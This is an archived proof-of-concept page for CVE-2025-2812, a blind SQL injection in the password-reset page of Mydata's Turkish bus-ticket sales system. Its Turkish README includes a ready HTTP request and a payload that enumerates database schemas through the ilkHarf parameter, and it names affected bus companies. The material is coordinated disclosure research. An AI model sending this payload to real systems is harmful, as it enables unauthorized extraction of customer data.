POC详情: db575eac1a1f834d77eed65f4fa232193257ecbd

来源
关联漏洞
标题: Mydata Ticket Sales Automation SQL注入漏洞 (CVE-2025-2812)
描述:Mydata Ticket Sales Automation是Mydata公司的一个票务销售自动化系统。 Mydata Ticket Sales Automation 03.04.2025之前版本存在SQL注入漏洞,该漏洞源于SQL命令中和不当,可能导致盲SQL注入。
描述
CVE-2025-2812 SQL Injection
介绍

# CVE-2025-2812 — SQL Injection Vulnerability in "Bilet Satış Otomasyonu" by Mydata Bilişim Ltd. Şti

> 📌 **CVE-ID:** [CVE-2025-2812](https://www.cve.org/cverecord?id=CVE-2025-2812)  
> 📢 **USOM Duyurusu:** [tr-25-0099](https://www.usom.gov.tr/bildirim/tr-25-0099)  
> 🛡️ **Zafiyet Tipi:** CWE-89 - SQL Injection (Boolean-based Blind)  
> 🏢 **Etkilenen Ürün:** Bilet Satış Otomasyonu – Mydata Bilişim Ltd. Şti  
> 🌐 **Örnek Hedef URL:** `https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php`  

---

## 🔍 Zafiyet Özeti

"Bilet Satış Otomasyonu" ürününde, şifre sıfırlama (SifremiUnuttum.php) sayfasındaki `"Adınızın ilk harfi"` (ilkHarf) parametresinde **Boolean-based Blind SQL Injection** zafiyeti tespit edilmiştir. Bu zafiyet, kullanıcı adı ya da parola olmadan sistemden veri sızdırılmasına imkân tanımaktadır.

Bu zafiyet, aşağıdaki otobüs firmalarının sistemlerini kapsıyor:
- Balıkesir Uludağ
- Kontur
- Efe Tur
- Kale Seyahat
- +20 firma
---

## 💥 PoC (Proof of Concept)

### 📌 HTTP Request:

```http
GET /otobus-bileti/SifremiUnuttumBilgi.php?TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW HTTP/1.1
Host: otobusfirmasi.com.tr
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
Cookie: PHPSESSID=***************
````

### 🧪 Kullanılan Payload:

```text
TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW
```

---

## 🧠 Teknik Detaylar

* **Zafiyetli Parametre:** `ilkHarf`
* **Yöntem:** Boolean-based Blind SQLi
* **Zafiyet Türü:** Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

---

## 🙏 Teşekkür

"Mydata Bilişim Ltd. Şti" tarafından geliştirilen "Bilet Satış Otomasyonu" ürününde tespit ettiğimiz zafiyet sonrası, CVE-2025-2812 koduyla duyurulan bu açık, üretici ve [USOM](https://www.usom.gov.tr) koordinasyonuyla ilan edilmiştir.
Bu süreçte siber güvenlik topluluğuna katkı sunmaktan gurur duyarız.

Zafiyetin bildirilmesini takiben, Mydata Bilişim Ltd. Şti gerekli tüm prosedürleri hızlıca uygulamış, ilgili güvenlik açığını kapatarak sistemlerine ek güvenlik önlemleri entegre etmiştir. Sürece gösterdikleri şeffaflık, iş birliği ve sorumluluk bilinci için kendilerine teşekkür ederiz.

Bu süreçte siber güvenlik topluluğuna katkı sunmaktan gurur duyarız.

---

## 📬 İletişim

Her türlü soru, geri bildirim ya da iş birliği için benimle iletişime geçebilirsiniz:

- 📧 E-posta: [hasanyasinyasar@gmail.com](mailto:hasanyasinyasar@gmail.com)  
- 📷 Instagram: [@yyasar.yasin](https://www.instagram.com/yyasar.yasin)

---
文件快照

[4.0K] /data/pocs/db575eac1a1f834d77eed65f4fa232193257ecbd └── [3.0K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。